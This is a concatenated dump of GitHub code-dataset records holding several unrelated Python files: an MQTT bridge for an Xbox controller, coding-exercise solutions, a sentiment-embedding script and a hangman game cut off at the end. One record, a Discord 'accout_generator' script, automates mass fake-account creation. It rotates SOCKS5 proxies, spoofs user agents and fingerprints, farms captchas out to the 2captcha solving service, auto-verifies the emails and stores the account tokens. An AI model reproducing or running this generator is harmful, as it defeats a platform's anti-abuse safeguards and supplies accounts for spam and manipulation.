main(sys.argv)\n\n\n\n","repo_name":"ArtechStark/yolo_v3_tensorflow","sub_path":"convert_weight.py","file_name":"convert_weight.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"47"} +{"seq_id":"2737060010","text":"# https://github.com/eclipse/paho.mqtt.python\nimport paho.mqtt.client as MQTT\nfrom paho.mqtt.client import MQTTv311\n\nfrom os import path\nimport time\nimport traceback\n\nfrom bits import Bits\nfrom colours import *\nfrom controller import Controller\nfrom input_controller import InputController\n\nclass BLE2MQTT:\n def __init__(self, name):\n self.ble_name = name\n self.topic_base = \"-\".join(self.ble_name.split(' '))\n\n self.mqtt = MQTT.Client(client_id=self.name(), clean_session=True, userdata=None, protocol=MQTTv311, transport=\"tcp\")\n self.mqtt.will_set(self.topic(\"connected\"), payload=b\"false\", qos=0, retain=True)\n\n self.ble_connected = False\n self.mqtt_connected = False\n\n self.ble_ctrl = None\n\n def __del__(self):\n if self.ble_ctrl:\n del self.ble_ctrl\n if self.mqtt_connected:\n self.mqtt.loop_stop()\n self.mqtt.disconnect()\n\n def _log(self, msg):\n print(\"{0} {1}\".format(self, msg))\n\n def _logble(self, msg):\n self._log(\"[{0}] {1}\".format(style(\"BLE\", Colours.FG.CYAN), msg))\n\n def _logmqtt(self, msg):\n self._log(\"[{0}] {1}\".format(style(\"MQTT\", Colours.FG.BLUE), msg))\n\n def _error(self, e=None, tb=True):\n if e:\n self._log(style(type(e).__name__, Colours.FG.RED) + \": {}\".format(e))\n if tb:\n self._log(style(traceback.format_exc(), Colours.FG.BRIGHT_MAGENTA))\n else:\n self._log(style(\"Unknown error\", Colours.FG.RED))\n\n def __str__(self):\n return style(\"{0}\".format(self.name()), Colours.FG.YELLOW)\n\n def __repr__(self):\n return style(\"<{0}, ble={1}, mqtt={2}>\".format(self.name(), self.ble_connected, self.mqtt_connected), Colours.FG.YELLOW)\n\n def topic(self, name):\n return path.join(self.topic_base, name)\n\n def name(self):\n return self.topic_base\n\n ###########################################################################\n ## BLUETOOTH\n\n def ble_connect(self):\n try:\n self._logble(\"Attempting connect...\")\n self.ble_ctrl = InputController(ctrl_name=self.ble_name)\n except Exception as e:\n self._error(e, tb=False)\n self.ble_connected = False\n else:\n self._logble(style(\"Connected\", Colours.FG.GREEN))\n self.ble_connected = True # OK\n\n def ble_get(self):\n \"\"\"Returns topic, value pair\"\"\"\n try:\n return self.ble_ctrl.read_next()\n except Exception as e:\n self._error(e)\n return None, None\n\n\n ###########################################################################\n ## MQTT\n\n def _on_connect(self, client, userdata, flags, rc):\n self._logmqtt(style(\"Connected\", Colours.FG.GREEN) \\\n + \" with result code {}\".format(rc))\n\n # client.subscribe(\"$SYS/#\")\n\n # client.message_callback_add(sub, callback)\n\n self.mqtt_connected = True\n\n def _on_disconnect(self, client, userdata, rc):\n self._logmqtt(style(\"Disconnected\", Colours.FG.RED) \\\n + \" with result code {}\".format(rc))\n\n def _on_message(self, client, userdata, msg):\n self._logmqtt(\"Received on '{0}' ({1}): {2}\".format(\n msg.topic, msg.qos,\n Bits.bytes_to_str(msg.payload)))\n\n def mqtt_connect(self, host, port=1883, lifetime=60):\n self.mqtt.on_connect = self._on_connect\n self.mqtt.on_disconnect = self._on_disconnect\n self.mqtt.on_message = self._on_message\n\n try:\n self._logmqtt(\"Trying to connect to {0}:{1}...\".format(host, port))\n self.mqtt.connect(host, port, lifetime)\n # self.mqtt_connected = True\n except Exception as e:\n self._error(e, tb=False)\n self.mqtt_connected = False\n\n def mqtt_publish(self, topic, payload, qos=0, retain=False):\n topic = self.topic(topic)\n\n self._logmqtt(\"Publishing to '{0}': {1}\".format(topic, Bits.bytes_to_str(payload)))\n self.mqtt.publish(topic, Bits.str_to_bytes(payload), qos, retain)\n\n\n ###########################################################################\n ## General\n\n def start(self):\n self.mqtt.loop_start()\n time.sleep(2) # Wait a bit for connection to complete\n\n try:\n while self.ble_connected and self.mqtt_connected:\n topic, value = self.ble_get()\n if topic and value is not None:\n self.mqtt_publish(topic, value)\n except KeyboardInterrupt:\n self.mqtt.disconnect()\n self.mqtt_connected = False\n\nif __name__ == \"__main__\":\n client = BLE2MQTT(\"Xbox Wireless Controller\")\n client.ble_connect()\n # client.mqtt_connect(\"127.0.0.1\")\n # DONT USE PUBLIC IP, OTHERWISE TELENET WILL KICK ME FROM THE INTERNET\n client.mqtt_connect(host=\"192.168.0.175\", port=1883)\n client.start()\n","repo_name":"ThenTech/NIIP-Labo","sub_path":"Lab3/Opdracht_2/BLE2MQTT/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28643750551","text":"import sys\n\n\ndef split(s):\n splits = [0]\n for i in range(len(s)):\n if s[i].isupper():\n splits.append(i)\n splits.append(-1)\n new_string = []\n for i in range(len(splits) - 1):\n new_string.append(s[splits[i]:splits[i + 1]])\n new_string[-1] += s[-1]\n return \" \".join(new_string).lower().strip()\n\n\ndef merge(s):\n new_string = \"\"\n s = s.split(\" \")\n new_string += s[0]\n for i in range(1, len(s)):\n new_string += s[i].capitalize()\n return new_string.strip()\n\n\nlines = sys.stdin.readlines()\n\nfor s in lines:\n s = s.split(\";\")\n\n if s[0] == \"S\":\n if s[1] == \"M\":\n s[2] = s[2][:-2]\n print(split(s[2]).strip())\n\n elif s[1] == \"V\":\n print(split(s[2]).strip())\n elif s[1] == \"C\":\n print(split(s[2]).strip())\n else:\n pass\n\n elif s[0] == \"C\":\n if s[1] == \"M\":\n s[2] = merge(s[2])\n s[2] = s[2].strip()\n s[2] += \"()\"\n print(s[2].strip())\n elif s[1] == \"V\":\n s[2] = merge(s[2])\n print(s[2].strip())\n elif s[1] == \"C\":\n s[2] = merge(s[2])\n print((s[2][0].upper() + s[2][1:]).strip())\n else:\n pass\n","repo_name":"flyinthunder/HackerRank","sub_path":"Interview Prep Kit/Week 1/Challenge 5 - Camel Case 4.py","file_name":"Challenge 5 - Camel Case 4.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13779504631","text":"import random\nimport requests\nimport json\nimport time\nimport base64\nimport quopri\nimport os\n\ndomain = \"domain.de\"\ncaptcha_key = \"key\"\nrequest_timeout = 500\n\n\n\nmail_dic = \"mails\"\ntoken_file = \"tokens.txt\"\n\ndef get_fingerprint(user_agent):\n headers_fingerprint = {\n \"Referer\": \"https://discord.com/register\",\n \"User-Agent\": user_agent\n }\n\n fingerprint = requests.get(url=\"https://discord.com/api/v9/experiments\", headers=headers_fingerprint)\n\n return fingerprint.json()[\"fingerprint\"]\n\ndef randomUserAgent():\n # Do\n return \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36\"\n\ndef randomSuperProperties(user_agent):\n s = \"{\\\"os\\\":\\\"Windows\\\",\\\"browser\\\":\\\"Chrome\\\",\\\"device\\\":\\\"\\\",\\\"system_locale\\\":\\\"en-US\\\",\\\"browser_user_agent\\\":\\\"\" + user_agent + \"\\\",\\\"browser_version\\\":\\\"109.0.5414.120\\\",\\\"os_version\\\":\\\"10\\\",\\\"referrer\\\":\\\"\\\",\\\"referring_domain\\\":\\\"\\\",\\\"referrer_current\\\":\\\"\\\",\\\"referring_domain_current\\\":\\\"\\\",\\\"release_channel\\\":\\\"stable\\\",\\\"client_build_number\\\":9999,\\\"client_event_source\\\":null}\"\n\n return base64.b64encode(s.encode(\"ascii\")).decode(\"ascii\")\n\ndef randomPassword():\n return ''.join(random.choice(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\") for i in range(10)) + '!'\n\ndef randomName():\n return ''.join(random.choice(\"abcdefghijklmnopqrstuvwxyz\") for i in range(8))\n\ndef randomBirthDay():\n t = \"\"\n r = \"\"\n r += str(random.randrange(1990, 2000))\n r += \"-\"\n t = str(random.randrange(1, 12))\n if len(t) == 1:\n t = \"0\" + t\n r += t\n r += \"-\"\n t = str(random.randrange(1, 30))\n if len(t) == 1:\n t = \"0\" + t\n r += t\n return r\n\nproxies_socks5 = []\nproxies_http = []\n\ndef load_proxies_http():\n global proxies_http\n\n file = open(\"proxies/http.txt\")\n for line in file:\n line = line.replace(\"\\n\", \"\")\n #if \":\" in line:\n # host = line.split(\":\")[0]\n # port = line.split(\":\")[1]\n #\n # proxies[host] = port\n\n proxies_http.append(line)\n\ndef load_proxies_socks5():\n global proxies_socks5\n\n file = open(\"proxies/socks5.txt\")\n for line in file:\n line = line.replace(\"\\n\", \"\")\n #if \":\" in line:\n # host = line.split(\":\")[0]\n # port = line.split(\":\")[1]\n #\n # proxies[host] = port\n\n proxies_socks5.append(line)\n\ndef randomProxy(type):\n global proxies_http\n\n if \"SOCKS5\" == type:\n return \"SOCKS5\", random.choice(proxies_socks5)\n if \"HTTP\" == type:\n return \"HTTP\", random.choice(proxies_http)\n\ndef solve_captcha(ss, proxy_type, proxy, pageurl):\n time.sleep(3)\n\n res_cap_submit = requests.get(url=\"http://2captcha.com/in.php?key=\" + captcha_key + \"&method=hcaptcha&sitekey=\" + ss + \"&proxytype=\" + proxy_type + \"&proxy=\" + proxy + \"&pageurl=\" + pageurl)\n if \"|\" not in res_cap_submit.text:\n print(\"ERROR 2captcha in.php: \" + res_cap_submit.text)\n \n id = res_cap_submit.text.split(\"|\")[1]\n\n while True:\n time.sleep(5)\n\n res_cap_get = requests.get(url=\"http://2captcha.com/res.php?key=\" + captcha_key + \"&action=get&id=\" + id)\n if res_cap_get.text != \"CAPCHA_NOT_READY\":\n break\n\n print(res_cap_get.text[:64])\n\n if \"ERROR\" in res_cap_get.text.upper():\n return \"\"\n\n return res_cap_get.text.split(\"|\")[1]\n\ndef register():\n\n password = randomPassword()\n birth_day = randomBirthDay()\n name = randomName()\n email = name + \"@\" + domain\n \n user_agent = randomUserAgent()\n fingerprint = get_fingerprint(user_agent)\n\n super_properties = randomSuperProperties(user_agent)\n\n proxy_type, proxy = randomProxy(\"SOCKS5\")\n\n proxy_use = dict(\n http=proxy_type.lower() + '://' + proxy,\n https=proxy_type.lower() + '://' + proxy\n )\n\n print(\"Data \" + email + \" \" + name + \" \" + password + \" \" + birth_day)\n\n data_try = {\n \"X-Super-Properties\": super_properties,\n \"fingerprint\": fingerprint,\n \"email\": email,\n \"username\": name,\n \"password\": password,\n \"invite\": \"null\",\n \"consent\": \"true\",\n \"date_of_birth\": birth_day,\n \"gift_code_sku_id\": \"null\",\n \"captcha_key\": \"null\",\n \"promotional_email_opt_in\": \"false\"\n }\n\n headers_try = {\n \"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n #\"Content-Length\": str(len(data)),\n \"User-Agent\": user_agent\n }\n\n res_try = requests.post(url=\"https://discord.com/api/v9/auth/register\", json=data_try, headers=headers_try, proxies=proxy_use, timeout=request_timeout)\n \n if \"retry_after\" in res_try.text:\n print(\"Wait before try again \" + str(res_try.json()[\"retry_after\"]))\n return\n\n token = \"\"\n\n j = res_try.json()\n\n if \"captcha_sitekey\" in res_try.text:\n site_key = j[\"captcha_sitekey\"]\n\n while True:\n \n print(\"Submit cap\")\n key = solve_captcha(site_key, proxy_type, proxy, \"https://discord.com/api/v9/auth/register\")\n\n if key == \"\":\n return\n\n\n data_reg = {\n \"fingerprint\": fingerprint,\n \"email\": email,\n \"username\": name,\n \"password\": password,\n \"invite\": \"null\",\n \"consent\": \"true\",\n \"date_of_birth\": birth_day,\n \"gift_code_sku_id\": \"null\",\n \"captcha_key\": key,\n \"promotional_email_opt_in\": \"false\"\n }\n\n headers_reg = {\n \"X-Super-Properties\": super_properties,\n \"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n \"Content-Length\": str(len(str(data_reg))),\n \"User-Agent\": user_agent,\n \"X-Fingerprint\": fingerprint,\n \"X-Debug-Options\": \"bugReporterEnabled\",\n \"Sec-Ch-Ua-Mobile\": \"?0\",\n \"X-Discord-Locale\": \"en-US\",\n \"Sec-Ch-Ua\": \"\\\"Chromium\\\";v=\\\"109\\\", \\\"Not_A Brand\\\";v=\\\"99\\\"\",\n \"Sec-Ch-Ua-Platform\": \"Linux\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Origin\": \"https://discord.com\"\n }\n\n res_reg = requests.post(url=\"https://discord.com/api/v9/auth/register\", json=data_reg, headers=headers_reg, proxies=proxy_use, timeout=request_timeout)\n #res_reg = requests.post(url=\"http://localhost:8888/api/v9/auth/register\", json=data_reg, headers=headers_reg)\n\n #print(res_reg.text)\n \n if \"captcha_sitekey\" in res_reg.text:\n site_key = res_reg.json()[\"captcha_sitekey\"]\n else:\n token = res_reg.json()[\"token\"]\n break\n\n elif \"token\" in j:\n token = j[\"token\"]\n\n if token != \"\":\n file = open(\"tokens.txt\", \"a\")\n file.write(token)\n file.write(\"###\")\n file.write(email)\n file.write(\"###\")\n file.write(name)\n file.write(\"###\")\n file.write(password)\n file.write(\"###\")\n file.write(birth_day)\n file.write(\"###\")\n file.write(super_properties)\n file.write(\"###\")\n file.write(fingerprint)\n file.write(\"###\")\n file.write(user_agent)\n file.write(\"###\")\n file.write(proxy)\n file.write(\"###\")\n file.write(proxy_type)\n\n file.write(\"\\n\")\n file.close()\n else:\n print(\"ERROR token gen\")\n\n #print(len(data))\n\ndef verfiy_email():\n for file in os.listdir(mail_dic):\n file_name = mail_dic + \"/\" + file\n dec = base64.b64decode(file.encode('ascii')).decode('ascii')\n if \" \" in dec:\n dec = dec.split(\" \")[1]\n\n email = dec\n \n s = \"\"\n a = False\n\n f = open(file_name, \"r\")\n for line in f:\n if \"--\" in line and not a:\n a = True\n elif \"--\" in line and a:\n a = False\n if \"https\" in s and \"discord\" in s:\n break\n s = \"\"\n\n if a:\n s += line\n \n s = s[s.index(\"https\"):]\n \n if \"\\\"\" in s:\n s = s[0:s.index('\\\"')]\n\n decoded = quopri.decodestring(s.encode('utf-8')).decode('utf-8').replace(\"\\n\", \"\")\n\n tokens = open(token_file)\n for line in tokens:\n if \"###\" in line:\n if line.split(\"###\")[1] in email:\n line = line[0:line.index('\\n')]\n\n super_properties = line.split(\"###\")[5]\n fingerprint = line.split(\"###\")[6]\n user_agent = line.split(\"###\")[7]\n proxy = line.split(\"###\")[8]\n proxy_type = line.split(\"###\")[9]\n\n #proxy_type = proxy_type[0:proxy_type.index('\\n')]\n\n #print(proxy)\n #print(proxy_type)\n\n proxy_use = dict(\n http=proxy_type.lower() + '://' + proxy,\n https=proxy_type.lower() + '://' + proxy\n )\n\n headers = {\n \"User-Agent\": user_agent\n }\n\n res = requests.get(url=decoded, headers=headers, proxies=proxy_use, allow_redirects=False)\n \n loc = res.headers[\"Location\"]\n\n token = loc.split(\"=\")[1]\n\n print(token)\n\n data_try = {\n \"token\": token,\n \"captcha_key\": \"null\"\n }\n\n headers_try = {\n \"X-Fingerprint\": fingerprint,\n \"X-Super-Properties\": super_properties,\n #\"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n #\"Content-Length\": str(len(data)),\n \"User-Agent\": user_agent\n }\n\n res_try = requests.post(url=\"https://discord.com/api/v9/auth/verify\", json=data_try, headers=headers_try, proxies=proxy_use, timeout=request_timeout)\n \n if \"retry_after\" in res_try.text:\n print(\"Wait before try again \" + str(res_try.json()[\"retry_after\"]))\n return\n\n user_id = \"\"\n new_token = \"\"\n\n j = res_try.json()\n\n if \"captcha_sitekey\" in res_try.text:\n site_key = j[\"captcha_sitekey\"]\n\n while True:\n \n print(\"Submit cap\")\n key = solve_captcha(site_key, proxy_type, proxy, \"https://discord.com/api/v9/auth/verify\")\n\n if key == \"\":\n return\n\n data_reg = {\n \"token\": token,\n \"captcha_key\": key\n }\n\n headers_reg = {\n \"X-Fingerprint\": fingerprint,\n \"X-Super-Properties\": super_properties,\n #\"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n #\"Content-Length\": str(len(data)),\n \"User-Agent\": user_agent\n }\n\n res_reg = requests.post(url=\"https://discord.com/api/v9/auth/verify\", json=data_reg, headers=headers_reg, proxies=proxy_use, timeout=request_timeout)\n \n\n \n if \"captcha_sitekey\" in res_reg.text:\n site_key = res_reg.json()[\"captcha_sitekey\"]\n else:\n user_id = res_reg.json()[\"user_id\"]\n new_token = res_reg.json()[\"token\"]\n break\n\n elif \"user_id\" in j:\n user_id = j[\"user_id\"]\n new_token = j[\"token\"]\n\n line = new_token + \"###\" + line + \"###\" + user_id\n\n file = open(\"verify_email.txt\", \"a\")\n file.write(line)\n file.write(\"\\n\")\n file.close()\n \ndef verify_number():\n file = open(\"verify_email.txt\")\n\n for line in file:\n if \"###\" in line:\n line = line[0:line.index('\\n')]\n #super_properties = line.split(\"###\")[5]\n #fingerprint = line.split(\"###\")[6]\n \n token = line.split(\"###\")[0]\n user_agent = line.split(\"###\")[8]\n proxy = line.split(\"###\")[9]\n proxy_type = line.split(\"###\")[10]\n\n #proxy_type = proxy_type[0:proxy_type.index('\\n')]\n\n #print(proxy)\n #print(proxy_type)\n\n proxy_use = dict(\n http=proxy_type.lower() + '://' + proxy,\n https=proxy_type.lower() + '://' + proxy\n )\n\n headers = {\n \"User-Agent\": user_agent,\n \"Authorization\": token\n }\n\n res = requests.get(url=\"https://discord.com/api/v9/users/@me/affinities/users\", headers=headers, proxies=proxy_use)\n\n if \"verify your account\" in res.text:\n print(\"F\")\n\n\n\n\nload_proxies_socks5()\n\n#print(randomProxy(\"http\"))\n#print(randomProp(\"w\"))\n\n#register()\n\n\n#print(get_fingerprint(randomUserAgent()))\n\n#verfiy_email()\n\nverify_number()\n","repo_name":"paupriv/discord","sub_path":"accout_generator/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":13894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1377980638","text":"\"\"\"\nDay 1: Advent of Code\n\"\"\"\n\n\ndef read_input(path: str) -> list:\n out = []\n with open(path, 'r') as file:\n line = file.readline()\n while line != '':\n out.append(int(line))\n line = file.readline()\n return out\n\n\ndef solve_for_two(input: list) -> int:\n my_set = set()\n for val in input:\n partner = 2020 - val\n\n if partner in my_set:\n return partner * val\n my_set.add(val)\n return -1\n\n\ndef solve_for_three(input: list) -> int:\n available_nums = set(input)\n processed = set()\n\n for i in range(len(input)):\n for j in range(i + 1, len(input)):\n val1 = input[i]\n val2 = input[j]\n\n missing = 2020 - val1 - val2\n\n if missing in available_nums:\n return missing * val1 * val2\n\n return -1\n\n\nif __name__ == '__main__':\n path = '/Users/danielgrittner/development/advent-of-code2020/day1/input.txt'\n input = read_input(path)\n print(solve_for_two(input))\n \n path2 = '/Users/danielgrittner/development/advent-of-code2020/day1/input2.txt'\n input2 = read_input(path2)\n print(solve_for_three(input2))\n","repo_name":"danielgrittner/advent-of-code2020","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70829999823","text":"# -*- coding: utf-8 -*-\n\n#Import necessary modules\n\nimport pickle\nfrom pypeaks import Data, Intervals\n\n#Load data\n#We already have provided some data samples and a script in examples/ directory. \n#If you don't have it, you can either load your own data, or download them from \n#https://github.com/gopalkoduri/pypeaks\n\ndata = pickle.load(open(\"../examples/sample-histogram.pickle\"))\nhist = Data(data[0], data[1])\n\n#Get peaks by slope method and plot them\n\nhist.get_peaks(method='slope')\nhist.plot()\n\n#Get peaks by interval method and plot them\n\n#In the example/ folder, there is a pickle file with some example intervals, \n#in this case, just-intonation intervals for music. They can refer to any intervals!\nji_intervals = pickle.load(open('../examples/ji-intervals.pickle'))\nji_intervals = Intervals(ji_intervals)\n\nhist.get_peaks(method='interval', intervals=ji_intervals)\nhist.plot(intervals=ji_intervals.intervals)\n\n#Accessing the peaks data\n#The Data object has x, y_raw, y, smoothness and peaks variables available. \n#The help functions shows the methods available for it:\n#try help(Data) in a python/ipython interpreter\n\n","repo_name":"gopalkoduri/pypeaks","sub_path":"pypeaks/examples/howto.py","file_name":"howto.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"47"} +{"seq_id":"25860375415","text":"import datetime\nimport json\nimport logging as lg\nfrom multiprocessing import Pool\n# from multiprocessing.shared_memory import SharedMemory\nfrom multiprocessing.managers import SharedMemoryManager\n\nimport numpy as np\nimport yaml\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\nfrom utils.multiset import MultiSet\n\n# noinspection PyUnresolvedReferences\n\nanalyser = SentimentIntensityAnalyzer()\n\nctd = None\nshape_val = None\nshape_id = None\n\n\ndef embed_line(line, n, contig_t_d, contig_t_embed, contig_val, contig_id):\n try:\n if line == '':\n return (-1, None, [])\n contig_t_embed_local = np.ndarray((600000, 4), dtype=np.float, buffer=contig_t_embed.buf)\n contig_t_d_local = np.ndarray((600000,), dtype=np.float, buffer=contig_t_d.buf)\n jline = json.loads(line)\n datestr = jline['date']['$date']\n datet = datetime.datetime.strptime(datestr, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n id = int(jline['id'])\n content = jline['content']\n date = datet.date()\n sent = analyser.polarity_scores(content)\n arr = [sent['neg'], sent['neu'], sent['pos'], sent['compound']]\n nparr = np.array(arr)\n contig_t_embed_local[n]=nparr\n contig_t_d_local[n]=datet.toordinal()\n n_date = np.datetime64(date)\n\n return id, n_date, arr\n except Exception as e:\n lg.error(str(e))\n raise e\n\n\nif __name__ == '__main__':\n import time\n\n start_time = time.time()\n\n # {\"_id\":{\"$oid\":\"5d7041dcd6c2261839ecf58f\"},\"username\":\"computer_hware\",\"date\":{\n # \"$date\":\"2016-04-12T17:10:12.000Z\"},\"retweets\":0,\"favorites\":0,\"content\":\"#Apple iPhone SE release date, price,\n # specs and features: iPhone SE users report Bluetooth ... Read more: http://owler.us/aayzDR $ AAPL\",\"geo\":\"\",\n # \"mentions\":\"\",\"hashtags\":\"#Apple\",\"replyTo\":\"\",\"id\":\"719905464880726018\",\n # \"permalink\":\"https://twitter.com/computer_hware/status/719905464880726018\"}\n with open('../resources/preferences.yaml') as f:\n prefs = yaml.load(f, Loader=yaml.FullLoader)\n\n multiset = MultiSet(prefs)\n\n with SharedMemoryManager() as smm:\n contig_ids = multiset.contig_ids\n # noinspection PyUnresolvedReferences\n contig_t_embed = smm.SharedMemory(size=np.empty((600000, 4)).nbytes)\n contig_t_d = smm.SharedMemory(size=np.empty((600000, 4), dtype='int64').nbytes)\n\n contig_t_val = smm.SharedMemory(size=multiset.contig_vals.nbytes)\n ctval_shp = multiset.contig_vals.shape\n ctval_np = np.ndarray(ctval_shp, buffer=contig_t_val)\n np.copyto(ctval_np, contig_t_val)\n contig_id_shared = smm.SharedMemory(contig_ids.nbytes)\n ctid__id_shp = contig_ids.shape\n ctid_np = np.ndarray(shape=ctid__id_shp, buffer=contig_id_shared)\n np.copyto(contig_id_shared, ctid_np)\n # check if we are running in text/image pair only\n lg.info(\"starting json processing in combined mode\")\n start_date = datetime.date(2011, 12, 29)\n end_date = datetime.date(2019, 9, 20)\n delta = end_date - start_date\n\n date_arr = [start_date + datetime.timedelta(days=i) for i in range(delta.days + 1)]\n\n date_arr_np = np.array([np.datetime64(d) for d in date_arr])\n\n boolarr = np.zeros(date_arr_np.shape, dtype=np.bool_)\n n_tweets = 0\n n_fail = 0\n skipped = 0\n n_t_tweets = 0\n batch = 500\n n_procs = 10\n with open(prefs['jsonfile'], \"r\", encoding=\"utf-8\") as file:\n with Pool(n_procs) as embed_pool:\n lines = [(file.readline(), n_t_tweets + a, contig_t_d, contig_t_embed, contig_t_val, contig_id_shared)\n for a in range(batch)]\n # lines = [file.readline() for a in range(batch)]\n # ctd_s = [contig_t_d for a in range(batch)]\n # cte_s = [contig_t_embed for a in range(batch)]\n # n = range(n_t_tweets,n_t_tweets+batch)\n # locs = range(n_t_tweets,n_t_tweets + batch)\n while lines[-1][0]:\n try:\n # results = embed_pool.uimap(embed_line,lines,n,ctd_s,cte_s)\n results = embed_pool.imap_unordered(embed_line,lines)\n for id, n_date, arr in results:\n # loc = contig_ids.searchsorted(id)\n # if loc < contig_ids.shape[0] and id == contig_ids[loc]:\n # multiset.contig_vals[loc, 24:] = arr\n # multiset.contig_dates[loc] = n_date\n # boolarr[np.argwhere(date_arr_np == n_date)] = True\n n_t_tweets += 1\n\n n_tweets += 1\n except Exception as e:\n lg.error(e)\n n_fail += 1\n raise e\n finally:\n lines = [(file.readline(), n_t_tweets + a, contig_t_d, contig_t_embed) for a in range(batch)]\n # lines = [file.readline() for a in range(batch)]\n # ctd_s = [contig_t_d for a in range(batch)]\n # cte_s = [contig_t_embed for a in range(batch)]\n # n = range(n_t_tweets, n_t_tweets + batch)\n if n_t_tweets >= 100000:\n print(time.time() - start_time)\n print(n_t_tweets)\n\n break\n\n\n # dates = date_arr_np.shape[0]\n # pos_inds = np.argwhere(boolarr).squeeze()\n # date_arr_np = date_arr_np[pos_inds]\n # n_null = dates - date_arr_np.shape[0]\n # lg.info(\"collected %s tweets with %s errors\", n_tweets, n_fail)\n # lg.info(\"collected tweets on %s dates\", (delta.days - n_null))\n # lg.info(\"deleted %s dates\", n_null)\n print(time.time()-start_time)\n ctd = np.ndarray((600000,4),np.float,buffer=contig_t_embed.buf)\n","repo_name":"arthurdecloedt/thesis","sub_path":"scripts/textembed_multi.py","file_name":"textembed_multi.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37449928296","text":"# Jumper Game (Generic Brand of 'Hangman')\n# Team 10 \n# 5/19/2022\n\nimport random\n\n# J'DEE\n# The puzzle is a secret word randomly chosen from a list.\n# # Words Class\nclass Words:\n \"\"\" The responsibility of this class is to generate and randomly pick from a list of words.\n \n Attributes: words: an array of words to choose from\n puzzle_word: the chosen word for the game\n \"\"\"\n def __init__(self):\n self.puzzle_word = \"\"\n# # # Methods\n# # # # set_word(self)\n def set_word(self):\n \"\"\"generates the puzzle word from the words array, and sets the value of the puzzle word to the selected word.\n \n Arguments: self: an insance of words.\"\"\"\n words = [\"boots\", \"clats\", \"gamet\", \"plant\", \"water\"]\n self.puzzle_word = random.choice(words)\n return self.puzzle_word\n \n \n\n\n \n# NATE\n# Letters Class\nclass Letters():\n# # init\n def __init__(self):\n# # # Attibutes\n self.letters_array = []\n self.user_choice = \"\"\n self.already_guessed = False\n\n# Methods\n# # # remove_letters(self)\n\n def add_letters(self):\n self.user_choice = input(\"Choose a letter: \")\n for i in self.letters_array:\n if i == self.user_choice:\n print(\"You already guessed this. Try again.\")\n self.already_guessed = True\n return self.already_guessed\n else:\n self.already_guessed = False\n self.letters_array.append(self.user_choice)\n return self.already_guessed\n\n# # JEREMY\n# # # Rules Class\nclass Game():\n# # init\n def __init__(self):\n self.num_wrong = 0\n self.winner = False\n self.answer_array = [\" _ \", \" _ \", \" _ \", \" _ \", \" _ \"]\n \n def play_round(self):\n game_letter = Letters()\n game_word = Words()\n term_serv = TerminalService()\n letters = \"\"\n term_serv.display()\n puzzle_array = game_word.set_word()\n for i in game_letter.letters_array:\n letters += i\n while term_serv.num_wrong != 5:\n while self.winner != True:\n game_letter.add_letters()\n for i in puzzle_array:\n if (game_letter.user_choice == i):\n print(\"Super Duper!\")\n place = puzzle_array.index(i)\n self.answer_array[place] = i\n right_answer = True\n break\n else:\n right_answer = False\n if game_letter.already_guessed == False:\n letters += game_letter.user_choice\n if right_answer == False:\n term_serv.num_wrong += 1\n term_serv.remove_chute() \n print(\" \")\n print(game_play.answer_array[0], game_play.answer_array[1], game_play.answer_array[2],game_play.answer_array[3],game_play.answer_array[4])\n print(\" \")\n print(f'\\nNumber of wrong guesses: {term_serv.num_wrong}\\n')\n term_serv.display()\n print(\" \")\n print(f'letters you have guessed: {letters}\\n')\n print(\"\")\n print(\"That's too many wrong. I'm sorry, your jumper's parachute stopped functioning, and now they are dead.\")\n \n\n\n\nclass TerminalService:\n def __init__(self):\n #Separated each step into a picture which will disappear when there is a mistake.\n self._first_mistake = \" ___\"\n self._second_mistake = \" /___\\ \"\n #The third mistake is actually just the second line without the / and \\.\n self._third_mistake = \" ___\"\n self._fourth_mistake = \" \\ /\"\n self._fifth_mistake = \" \\ /\"\n self._guy = \" o\\n /|\\ \\n / \\ \"\n #Dead guy is used at the very end to represent a loss.\n self._dead_guy = \" x\\n /|\\ \\n / \\ \"\n #Decided to combine all of the different pictures into an array so I could print it easier.\n self._whole_picture = [self._first_mistake, self._second_mistake, self._fourth_mistake, self._fifth_mistake, self._guy]\n self.num_wrong = 0\n \n #display function uses if statements to change the array and then displays it \n def remove_chute(self):\n if (self.num_wrong == 1) | (self.num_wrong == 3) | (self.num_wrong == 4):\n self._whole_picture.remove(self._whole_picture[0])\n elif self.num_wrong == 2:\n #replaces second_mistake with third_mistake\n self._whole_picture[0] = self._third_mistake\n elif self.num_wrong == 5:\n self._whole_picture.remove(self._whole_picture[0])\n self._whole_picture[0] = self._dead_guy\n elif self.num_wrong <=0:\n self._whole_picture = self._whole_picture\n return self._whole_picture\n\n def display(self):\n print(*self._whole_picture, sep='\\n')\n \n\n \n def rules(self):\n pass\n \ngame_play = 